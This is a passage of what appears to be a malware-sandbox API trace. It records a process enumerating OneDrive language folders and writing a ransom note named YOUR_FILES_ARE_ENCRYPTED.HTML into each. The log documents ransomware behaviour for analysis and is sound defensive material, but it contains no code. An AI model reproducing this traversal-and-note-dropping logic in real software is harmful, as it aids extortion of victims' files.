ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa92c56b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x13ca8, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0160.527] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\fr\\FileSync.LocalizedResources.dll.mui") returned 110 [0160.527] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0160.527] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0160.527] lstrlenW (lpString=".mui") returned 4 [0160.527] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0160.527] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa92c56b0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa92c56b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa92c56b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x13ca8, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0160.527] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0160.527] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\fr\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 104 [0160.527] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\fr\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\fr\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5bc [0160.528] WriteFile (in: hFile=0x5bc, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0160.530] CloseHandle (hObject=0x5bc) returned 1 [0160.530] GetProcessHeap () returned 0x270000 [0160.531] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0160.531] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa92c56b0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa95e5390, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa95e5390, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="ga-ie", cAlternateFileName="")) returned 1 [0160.531] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ga-ie") returned 77 [0160.531] GetProcessHeap () returned 0x270000 [0160.531] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0160.531] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ga-ie" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ga-ie") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ga-ie" [0160.531] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ga-ie", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ga-ie\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ga-ie\\*" [0160.531] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ga-ie\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa92c56b0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa95e5390, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa95e5390, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0160.532] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa92c56b0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa95e5390, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa95e5390, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0160.533] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa95e5390, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa95e5390, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa95e5390, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x136a8, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0160.533] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ga-ie\\FileSync.LocalizedResources.dll.mui") returned 113 [0160.533] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0160.533] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0160.533] lstrlenW (lpString=".mui") returned 4 [0160.533] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0160.533] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa95e5390, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa95e5390, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa95e5390, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x136a8, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0160.533] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0160.533] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ga-ie\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 107 [0160.533] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ga-ie\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\ga-ie\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5bc [0160.534] WriteFile (in: hFile=0x5bc, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0160.536] CloseHandle (hObject=0x5bc) returned 1 [0160.536] GetProcessHeap () returned 0x270000 [0160.537] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0160.537] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa95e5390, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa96c9bd0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa96c9bd0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="gd", cAlternateFileName="")) returned 1 [0160.537] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\gd") returned 74 [0160.537] GetProcessHeap () returned 0x270000 [0160.537] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0160.537] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\gd" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\gd") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\gd" [0160.537] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\gd", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\gd\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\gd\\*" [0160.537] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\gd\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa95e5390, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa96c9bd0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa96c9bd0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0160.540] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa95e5390, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa96c9bd0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa96c9bd0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0160.540] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa96c9bd0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa96c9bd0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa9ce3430, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x146a8, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0160.540] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\gd\\FileSync.LocalizedResources.dll.mui") returned 110 [0160.540] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0160.540] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0160.540] lstrlenW (lpString=".mui") returned 4 [0160.540] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0160.540] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa96c9bd0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa96c9bd0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa9ce3430, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x146a8, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0160.540] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0160.540] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\gd\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 104 [0160.540] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\gd\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\gd\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5bc [0160.541] WriteFile (in: hFile=0x5bc, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0160.543] CloseHandle (hObject=0x5bc) returned 1 [0160.543] GetProcessHeap () returned 0x270000 [0160.544] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0160.544] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa9ce3430, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa9eac4b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa9eac4b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="gd-latn", cAlternateFileName="")) returned 1 [0160.544] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\gd-latn") returned 79 [0160.544] GetProcessHeap () returned 0x270000 [0160.544] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0160.544] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\gd-latn" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\gd-latn") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\gd-latn" [0160.544] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\gd-latn", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\gd-latn\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\gd-latn\\*" [0160.544] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\gd-latn\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa9ce3430, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa9eac4b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa9eac4b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0160.545] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa9ce3430, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa9eac4b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa9eac4b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0160.545] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa9eac4b0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa9eac4b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa9eac4b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x146a8, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0160.545] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\gd-latn\\FileSync.LocalizedResources.dll.mui") returned 115 [0160.545] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0160.545] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0160.545] lstrlenW (lpString=".mui") returned 4 [0160.546] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0160.546] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa9eac4b0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa9eac4b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa9eac4b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x146a8, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0160.546] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0160.546] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\gd-latn\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 109 [0160.546] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\gd-latn\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\gd-latn\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5bc [0160.546] WriteFile (in: hFile=0x5bc, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0160.548] CloseHandle (hObject=0x5bc) returned 1 [0160.549] GetProcessHeap () returned 0x270000 [0160.549] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0160.549] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa9eac4b0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaa09b690, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaa09b690, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="gl", cAlternateFileName="")) returned 1 [0160.549] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\gl") returned 74 [0160.549] GetProcessHeap () returned 0x270000 [0160.549] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0160.549] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\gl" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\gl") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\gl" [0160.550] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\gl", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\gl\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\gl\\*" [0160.550] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\gl\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa9eac4b0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaa09b690, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaa09b690, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0160.550] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa9eac4b0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaa09b690, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaa09b690, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0160.551] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa09b690, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaa09b690, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaa09b690, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x130a8, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0160.551] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\gl\\FileSync.LocalizedResources.dll.mui") returned 110 [0160.551] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0160.551] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0160.551] lstrlenW (lpString=".mui") returned 4 [0160.551] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0160.551] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa09b690, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaa09b690, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaa09b690, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x130a8, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0160.551] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0160.551] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\gl\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 104 [0160.551] CreateFileW 